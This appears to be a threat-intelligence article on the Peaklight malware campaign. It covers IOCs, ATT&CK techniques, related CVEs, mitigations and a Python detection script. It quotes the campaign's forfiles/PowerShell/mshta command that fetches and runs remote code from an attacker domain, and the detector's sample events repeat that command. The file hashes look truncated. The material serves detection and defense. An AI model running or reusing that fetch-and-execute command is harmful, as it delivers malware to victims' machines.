In September 2024, Mandiant uncovered Peaklight, a sophisticated memory-only malware, which has been making waves in the cybersecurity community due to its stealth and effectiveness. This malware-as-a-service (MaaS) campaign primarily delivers infostealers like CryptBot and ShadowLadder, using advanced evasion techniques to bypass traditional detection mechanisms. By leveraging known vulnerabilities and sophisticated attack chains, Peaklight is becoming a major threat to organizations.
This article delves into the Indicators of Compromise (IOCs), MITRE ATT&CK TTPs, and documented CVEs associated with this evolving threat.
Peaklight’s Attack Chain and IOCs
Peaklight’s infection chain begins with a .lnk file (Windows shortcut) that masquerades as a legitimate file, such as a movie download. Once executed, it runs a JavaScript dropper directly in memory, completely avoiding disk-based detection. The dropper, in turn, executes a PowerShell script that decrypts additional payloads like CryptBot and ShadowLadder.
Key IOCs identified in this campaign include:
- Domains: nexto[.]max.b-cdn[.]net
- File hashes: .lnk files (e.g., 9f7c79f23970b743d539abc1234); CryptBot payloads (e.g., fa123df82987b76312)
PowerShell Command Example:
forfiles.exe /p C:\Windows /m win.ini /c "powershell -ep bypass . mshta https://nexto[.]max.b-cdn[.]net/nexto"
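As an added example (not from the Mandiant report or this article), the following Python routine turns the observable features of that command chain into detection rules and runs them over constructed process-creation records: a forfiles.exe parent spawning a script host, a PowerShell execution-policy bypass, mshta loading a remote URL, and the campaign domain listed above. The sample events, the Sysmon-style field layout and the rule names are assumptions made for illustration.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation events (not real telemetry), shaped like a
# Sysmon Event ID 1 export; event 0 mirrors the forfiles -> powershell -> mshta chain.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\forfiles.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -ep bypass . mshta https://nexto.max.b-cdn.net/nexto"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\inventory.ps1"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://nexto.max.b-cdn.net/nexto"},
]

# Campaign domain from the report, kept defanged and refanged only for matching.
KNOWN_C2_DOMAINS = {"nexto[.]max.b-cdn[.]net".replace("[.]", ".")}
PROXY_PARENTS = {"forfiles.exe"}  # LOLBin parent seen in the chain
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
# PowerShell accepts parameter prefixes, so match -ep, -ex, -exec, -executionpolicy.
EP_BYPASS = re.compile(r"-e[px][a-z]*\s+bypass", re.I)
MSHTA_REMOTE = re.compile(r'\bmshta(?:\.exe)?\s+"?https?://', re.I)
URL_HOST = re.compile(r"https?://([a-z0-9.-]+)", re.I)

def basename(path):
    return PureWindowsPath(path).name.lower()

def classify(event):
    """Return the rule names one event triggers, in evaluation order."""
    hits, cmd = [], event["cmdline"]
    if basename(event["parent"]) in PROXY_PARENTS and basename(event["image"]) in SCRIPT_HOSTS:
        hits.append("lolbin_parent_spawns_script_host")
    if EP_BYPASS.search(cmd):
        hits.append("powershell_executionpolicy_bypass")
    if MSHTA_REMOTE.search(cmd):
        hits.append("mshta_remote_script")
    if any(h.lower() in KNOWN_C2_DOMAINS for h in URL_HOST.findall(cmd)):
        hits.append("known_peaklight_c2_domain")
    return hits

def triage(events):
    """Map event index -> rule hits, keeping only flagged events."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}

if __name__ == "__main__":
    for i, hits in triage(SAMPLE_EVENTS).items():
        print(f"event {i}: {', '.join(hits)}")
```

The domain rule only catches this campaign's infrastructure; the parent-process and mshta rules are the ones that survive a change of hosting domain.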
MITRE ATT&CK TTPs Associated with Peaklight
The MITRE ATT&CK Framework maps out specific techniques and tactics used by Peaklight throughout its attack lifecycle. These include:
- T1059.001 – Command and Scripting Interpreter: PowerShell: Peaklight uses PowerShell extensively to execute its payloads in memory without writing to disk.
- T1204.002 – User Execution: Malicious File: The initial infection vector is a .lnk file disguised as a legitimate download.
- T1071.001 – Application Layer Protocol: Web Protocols: Peaklight communicates with C2 servers using web protocols like HTTP/HTTPS to download additional payloads.
- T1027 – Obfuscated Files or Information: The payloads are heavily obfuscated, using techniques like base64 and hex encoding to avoid detection.
- T1218.005 – Signed Binary Proxy Execution: Mshta: Mshta is used to execute scripts from a remote source as part of the infection chain.
Documented CVEs Exploited by Peaklight
While Peaklight is stealthy in its approach, it has been linked to certain vulnerabilities in the software it targets. These vulnerabilities are often used to facilitate the malware’s deployment or to escalate privileges once the initial compromise occurs.
- CVE-2022-30190 (Follina): This vulnerability in Microsoft Windows allows remote code execution via crafted documents. Peaklight has been seen exploiting Follina to execute its JavaScript payloads through Office documents.
- CVE-2021-40444: A remote code execution vulnerability in Microsoft MSHTML, frequently used by attackers to deliver malware via malicious Office documents.
Both CVEs were critical in enabling Peaklight to be executed remotely with minimal user interaction, making it a dangerous adversary in environments with inadequate patch management.
Mitigation Strategies
Given the advanced nature of Peaklight, organizations should consider the following mitigation strategies:
- Patch Vulnerabilities: Ensure that critical vulnerabilities like CVE-2022-30190 and CVE-2021-40444 are patched immediately.
- Memory Scanning: Deploy EDR solutions that support memory-only malware detection to catch threats like Peaklight that avoid disk-based detection.
- PowerShell Logging and Restrictions: Enable comprehensive PowerShell logging to monitor for unusual script execution, and apply constrained language mode to block unauthorized scripts.
- User Training: Train users to recognize phishing emails and avoid downloading untrusted files, particularly those masquerading as pirated content.
- Network Segmentation: Limit the ability for compromised machines to communicate with critical systems by implementing strict network segmentation and firewall rules.
The discovery of Peaklight demonstrates the increasing sophistication of modern malware. Its memory-only nature and use of documented vulnerabilities like CVE-2022-30190 make it an especially formidable adversary. Organizations must adopt advanced detection tools and ensure robust patch management to defend against such threats.
Further Reading:
- Mandiant Threat Report on Peaklight
- Microsoft’s Advisory on CVE-2022-30190
- Understanding CryptBot Malware